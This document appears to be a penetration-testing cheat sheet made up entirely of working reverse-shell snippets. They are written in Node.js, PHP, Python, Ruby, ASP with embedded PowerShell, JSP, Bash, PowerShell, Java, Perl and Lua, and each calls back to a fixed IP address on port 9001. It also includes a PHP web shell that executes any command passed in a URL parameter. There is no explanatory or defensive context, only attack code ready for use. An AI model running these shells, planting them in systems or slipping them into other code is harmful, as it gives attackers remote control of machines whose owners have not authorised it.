Code Execution - Web Snippets
Node.js - Reverse Shell via child_process
import { exec } from 'child_process';
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'");
console.log("Test executed!");
Node.js - Reverse Shell via spawn
const { spawn } = require('child_process');
const sh = spawn('/bin/sh', []);
const net = require('net');
const client = new net.Socket();
client.connect(9001, '192.168.45.226', () => {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
PHP - Reverse Shell
<?php
$sock=fsockopen("192.168.45.226",9001);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
PHP - Command Execution via system
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
http://target.com/shell.php?cmd=id
Python - Reverse Shell
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.45.226",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
Ruby - Reverse Shell
require 'socket'
c=TCPSocket.new("192.168.45.226",9001)
while(cmd=c.gets)
IO.popen(cmd,"r"){|io|c.print io.read}
end
ASP - Reverse Shell
<%
Set s=Server.CreateObject("WScript.Shell")
Set e=s.Exec("cmd.exe /c powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()")
Response.Write e.StdOut.ReadAll()
%>
JSP - Reverse Shell
<%
Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'");
%>
Bash - Reverse Shell
bash -i >& /dev/tcp/192.168.45.226/9001 0>&1
PowerShell - Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Java - Reverse Shell
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class ReverseShell {
public static void main(String[] args) throws IOException {
String host = "192.168.45.226";
int port = 9001;
Process process = new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
Socket socket = new Socket(host, port);
InputStream processInput = process.getInputStream();
OutputStream processOutput = process.getOutputStream();
InputStream socketInput = socket.getInputStream();
OutputStream socketOutput = socket.getOutputStream();
while (true) {
while (processInput.available() > 0) {
socketOutput.write(processInput.read());
}
while (socketInput.available() > 0) {
processOutput.write(socketInput.read());
}
socketOutput.flush();
processOutput.flush();
}
}
}
Perl - Reverse Shell
use Socket;
$ip = "192.168.45.226";
$port = 9001;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(S, sockaddr_in($port, inet_aton($ip)));
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
Lua - Reverse Shell
local host, port = "192.168.45.226", 9001
local socket = require("socket")
local tcp = socket.tcp()
tcp:connect(host, port)
while true do
local cmd = tcp:receive()
local f = io.popen(cmd, "r")
local s = f:read("*a")
f:close()
tcp:send(s)
end
tcp:close()